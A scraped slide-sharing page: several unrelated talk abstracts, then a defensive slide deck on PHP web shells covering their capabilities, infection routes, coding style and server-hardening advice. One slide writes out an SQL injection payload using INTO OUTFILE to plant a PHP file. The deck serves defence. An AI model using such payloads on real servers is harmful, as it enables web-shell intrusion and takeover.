We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
3. ● Scripts written (mostly) in PHP*;
● Placed on a server (mostly under existing PHP sites)
without authorization from server/web site owner;
● Used for "unauthorized maintenance" of the infected
server;
● By the "unauthorized maintenance", we mean literally
anything.
What are PHP shell scripts?
4. ● Running applications/scripts (with root privileges)
● "Piggybacking" on existing local exploits
● Modifying files
● Changing user passwords
● Enabling/disabling/reconfiguring system services
● Dumping, destroying and modifying databases
● Opening new backdoors to the system
"Unauthorized maintenance"
5. ● Surprisingly yes, C99shell and all of it's derivates seem
to be most widespread PHP Shells out there.
● There are literally thousands of PHP shell scripts out
there, quality varies.
Are there "the best" PHP shells?
10. ● But most of the responsibility is on the programmer.
● PHP team often does good job describing possible
security pitfalls in their documentation
Documented possible pitfalls
11. ● attacks through standard filesystem functions which
allow socket operations like fopen(), include(),
require()...*
● attacks through unvalidated upload forms (not
documented clearly enough, obviously...)
● in the worst case scenario, due to constellation of
multiple bugs/vulnerabilities/weak setup, attacker might
even use SQL injection to write files on your server!
mysql> SELECT `injected_malicious_data`
FROM `yourtable`
INTO OUTFILE "file.php"
Documented possible vulnerabilities
12. ● Legend says there were infections with shell scripts
through stolen FTP credentials.
So, it's about time you change your "god", "sex" and
"love" stuff. Also, change those "password" and
"password123". In other words, your server's security is
as strong as it is its weakest link.
● On shared hosting environments without proper user
account isolation, it might not even be you who is
infected but other shared hosting client. Consult hosting
support in order to track down how you were attacked.
Other methods of infection
14. And now the interesting part...
Let's take a peek at PHP shells code
15. ● Rather clever, if not smart, architecture
● Written mostly in PHP, but can bring any exploiting code
inside PHP source code in binary (compiled) form
(mostly base64 encoded within variables) or even
download needed exploits (source or binary) from 3rd
party sites, compile and/or run them.
● If needed, can pull its own components from 3rd party
sites.
General architecture
16. ● Decentralized development
● Resulting in many variations of all of PHP shells in
the wild
● Code often complied to such development process,
usually securing itself from redefining crucial
components
(if !function_exists())... prior to all important
definitions)
● Can rely on 0-day exploits!
Quick development cycle
17. ● The scary part: it's a really short way from "plain PHP
shell" to a full-blown bot script controlled through IRC
Quick development cycle
18. ● Not written by your know-just-a-little-coding regular PHP
dev (no pun intended)
● You'll see what I mean...
Coding style
19. ● Well documented code:
function mysql_query_parse($query, $output_type)
{
/*
if output_type == 0, no output,
if output_type == 1, no output if no error
if output_type == 2, output without control-buttons
if output_type == 3, output with control-buttons
*/
...
}
Coding style
20. ● Proper understanding and usage of variable scopes:
function c99fsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $search_i_f;
global $search_i_d;
global $a;
...
}
Coding style
21. ● It's usually safer code than many of the production PHP
code in the wild:
● If it's a cross-platform shell, it performs checks before
doing a function unavailable on other platform(s)
● Variables included in HTML output are escaped, so
no easy path to unwanted XSS
● SQL query parameters are also escaped, no easy
path to unwanted SQL injections
Coding style
22. ● Variable/function names obfuscation is done/not done
in approximately 50:50 examples from our collected
PHP shells
● External URLs, usernames, passwords are mostly
always encoded using either base64 encoding or some
kind of ascii-code-to-hex-codes conversion
● Obviously not for real protection but obfuscation
against most obvious pattern-searching during
attempts of detection*
Coding style
24. ● Mostly quite ugly but always very efficient
● Sortable table outputs on every field
● You might be tempted to administer your server solely
through PHP shell scripts. :-)
GUI
27. These recommendations are best for hosters, but
the developers are also invited to have them in mind!
● Whenever possible, chroot or go even further with
isolation of different web sites on the same machine
(containers/pseudo-virtualization/virtualization), limiting
potential damage to just one site.
● Regulary update your server's OS – PHP shells (as
we've learned) can bring along local exploits.
● Seriously consider complex password policies if you're
running shared hosting environment.
System preparation
28. ● Disable potentially dangerous socket functionality of
filesystem PHP functions if you don't need it
(allow_url_fopen, allow_url_include in
php.ini)
if you're not sure – you don't need it
● When editing, keep in mind some systems
(*cough*Debian*cough*) may have multiple php.ini
files (one for mod_php, one for CLI, one for CGI...). Take
care of them all.
● Follow usual security principles in server administration
and maintenance.
Global PHP configuration
29. ● Consider further crippling PHP by disabling at least
program execution PHP functions if you don't need them
(through disable_functions).
● Which are those?
http://www.php.net/manual/en/ref.exec.php
● Leave something enabled from program execution
functions?*
escapeshellarg(), escapeshellcmd()
● While on that subject – you can't disable eval() like
this. :-)
Global PHP configuration
30. ● Always be checking uploaded files! (it is incredible how
much code does not do any kind of checks)
● Keep in mind not to rely on $_FILES[…]['type'].
Why?
Follow good coding practices
32. ● In general, checking for file extension could do you
just well... If you don't end up only on that, use it as the
primary defense measure.
● That might just not be enough sometimes. You might
want to step-up this game:
● check for mime-type on server. On linux, you can use
external FILE(1) utility. Assuming you haven't
disabled program execution functions.
● We'll see how others do it later.
Ok, how to check uploaded files?
33. ● Always be sanitizing and validating inputs. PHP shells
can be injected through various vectors:
● Apply programming techniques to eliminate possible
SQL injections (escaping, parametrization...)
● Always be escaping shell commands you execute and
their arguments.
● Always doublecheck on filenames of files (and their
paths!) you handle from the code!
Follow good coding practices
35. ● As far as file uploads go, WordPress checks for
uploaded media types by instancing them in respective
modules (i. e. calls GD's getimagesize() on images)
● WordPress is generally very safe CMS. 3rd party plugins
are usually the source of security issues and PHP shell
infections.
WordPress
36. ● Puts no limitation itself on the uploaded content, since it
is attached to e-mail messages and then deleted from
temporary locations.
● Is it possible to attack remote e-mail clients like that?
Depending on the destination client, it's possible. Not
something Roundcube devs should and could focus on.
Roundcube webmail
37. ● Guesses the mime-type by extension, and you limit
allowed mime-types for upload through configuration.
● You can enable upload of "dangerous file types" if you
want.
Dokuwiki
38. Bonus slide
What happens when frustrated
Sendmail administrators write
PHP shells?
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html